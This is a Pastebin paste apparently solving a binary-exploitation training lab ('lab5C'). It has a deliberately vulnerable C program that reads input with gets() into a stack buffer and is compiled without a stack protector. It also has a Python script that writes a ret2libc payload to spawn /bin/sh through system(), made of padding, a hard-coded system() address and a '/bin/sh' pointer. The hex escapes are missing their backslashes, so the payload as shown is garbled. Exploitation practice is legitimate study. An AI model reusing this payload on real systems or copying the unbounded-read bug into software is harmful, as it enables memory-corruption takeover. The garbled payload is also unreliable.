Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #include <stdlib.h>
- #include <stdio.h>
- /* gcc -fno-stack-protector -o lab5C lab5C.c */
- char global_str[128];
- /* reads a string, copies it to a global */
- void copytoglobal()
- {
- char buffer[128] = {0};
- gets(buffer);
- memcpy(global_str, buffer, 128);
- }
- int main()
- {
- char buffer[128] = {0};
- printf("I included libc for you...n"
- "Can you ROP to system()?n");
- copytoglobal();
- return EXIT_SUCCESS;
- }
- from __future__ import print_function
- import sys
- orig_stdout = sys.stdout
- f = open('out.txt', 'w')
- sys.stdout = f
- print("A"*156, end='')
- print("xa0x6fxe2xf7", end='') #system's adress read from p* system
- print("ABCD", end='') #errasing return adress with garbage
- print("x97xdfxffxff") #"/bin/sh"
- sys.stdout = orig_stdout
- f.close()
Add Comment
Please, Sign In to add comment
